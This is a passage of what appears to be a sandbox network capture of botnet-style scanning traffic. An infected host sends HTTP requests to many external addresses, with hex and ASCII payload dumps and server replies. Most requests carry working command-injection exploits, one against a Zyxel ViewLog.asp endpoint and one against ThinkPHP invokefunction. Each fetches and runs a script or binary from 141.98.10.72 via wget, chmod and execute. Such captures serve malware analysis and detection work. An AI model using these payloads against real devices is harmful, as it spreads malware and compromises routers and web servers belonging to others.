                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:41.447593927 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:44.167480946 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:49.287235975 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:59.526818991 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:20.774039030 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:01.732345104 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        355192.168.2.144120495.111.238.588080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:39.538558960 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        356192.168.2.145345285.13.140.1598080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:39.552659988 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:39.778579950 CET93INHTTP/1.1 500 Internal Server Error
                                                        Access-Control-Allow-Origin: *
                                                        Data Raw: 42 61 64 20 72 65 71 75 65 73 74
                                                        Data Ascii: Bad request


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        357192.168.2.143750094.68.189.2478080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:39.570853949 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:39.812859058 CET376INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 10:33:18 GMT
                                                        Server: DNVRS-Webs
                                                        Cache-Control: no-cache
                                                        Content-Length: 166
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=60, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        358192.168.2.144654862.29.109.2328080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:39.574790955 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        359192.168.2.143656694.123.57.2548080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:39.576812029 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        360192.168.2.145751695.103.48.588080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:39.578052998 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:39.835619926 CET288INHTTP/1.1 200 OK
                                                        Server: Virtual Web 0.9
                                                        Set-Cookie: SessionID=; path=/
                                                        Content-Type: text/html
                                                        Content-Length: 151
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 22 50 72 61 67 6d 61 22 20 43 4f 4e 54 45 4e 54 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 27 6a 61 76 61 73 63 72 69 70 74 27 3e 70 61 72 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 3d 22 2f 6c 6f 67 69 6e 2e 68 74 6d 22 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><meta HTTP-EQUIV="Pragma" CONTENT="no-cache"><script language='javascript'>parent.location="/login.htm"</script></head><body></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        361192.168.2.145467694.120.146.1208080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:39.578578949 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        362192.168.2.144821495.101.226.5080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:40.038563013 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:40.235080957 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:33:40 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:40 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 37 63 38 36 34 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 36 32 30 26 23 34 36 3b 35 36 35 63 35 37 63 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;67c8645f&#46;1707899620&#46;565c57cd</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        363192.168.2.145638895.100.178.8880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:40.041352034 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:40.243272066 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:33:40 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:40 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 35 31 66 31 36 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 36 32 30 26 23 34 36 3b 66 31 31 39 30 65 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;a51f1602&#46;1707899620&#46;f1190ef</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        364192.168.2.145909095.100.51.14080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:40.050023079 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:40.260596991 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:33:40 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:40 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 36 66 39 30 61 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 36 32 30 26 23 34 36 3b 31 61 63 33 31 65 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;56f90a17&#46;1707899620&#46;1ac31e0</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        365192.168.2.145212295.101.220.12180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:40.056559086 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:40.273803949 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:33:40 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:40 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 64 30 62 31 35 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 36 32 30 26 23 34 36 3b 31 30 36 38 39 33 34 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;3d0b1502&#46;1707899620&#46;1068934c</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        366192.168.2.145665495.217.179.12680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:40.064625025 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:40.290164948 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:33:40 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        367192.168.2.144037495.101.227.11280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:40.236932039 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:40.433752060 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:33:40 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:40 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 65 63 38 36 34 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 36 32 30 26 23 34 36 3b 35 64 65 61 62 38 62 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;3ec8645f&#46;1707899620&#46;5deab8b9</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        368192.168.2.144428895.101.219.11380
                                                        TimestampBytes transferredDirectionData
